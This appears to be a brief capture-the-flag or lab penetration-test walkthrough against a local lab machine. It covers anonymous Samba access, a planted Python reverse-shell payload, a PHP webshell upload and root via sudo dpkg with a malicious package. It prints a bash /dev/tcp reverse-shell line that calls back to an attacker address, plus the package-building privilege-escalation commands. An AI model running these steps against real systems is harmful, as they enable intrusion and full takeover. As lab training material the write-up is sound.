本文详细描述了一次渗透测试的过程,包括通过HTTP获取提示,使用Enum4Linux获取Samba共享,利用PHP上传木马获取反向Shell,之后查找并利用系统漏洞提升权限至root。过程中涉及了smbclient、venom、dpkg等工具和技术。
1. get first reverse shell
visit port 80, from the page http://192.168.85.135/index.php/2021/06/27/hola-mundo/ we get hint.
use enum4linux to get samba shares, the we get the directory tester which we can visit without user and passwd.
follow the hint, we put the text.txt using smbclient in this share, wait a moment, we get first reverse shell.
test.txt
import commands
commands.getoutput('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.85.129/4444 0>&1"')
2. get root
check process list, we can see the user webservies run php localhost.
we use the tool venom to forward localhost port 8080 to attack machine port 8888.
upload a word shell by upload.php.
because of thedisable_functions, you can not use terminal directly. you can use php7_userfilter to bypass. But in there, you do not need to do this.
check the file which own to user webservices.
we find the /opt/logs/log.txt will be changed by /opt/website.py at intervals. so we change the file to reverse a new shell.
then, we get the new user shell.
check sudo -l, we find the dpkg -i[1]. make a particular deb by using fpm, we get the root.
TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
3. references
- https://gtfobins.github.io/gtfobins/dpkg/
扫一扫
到【灌水乐园】发言
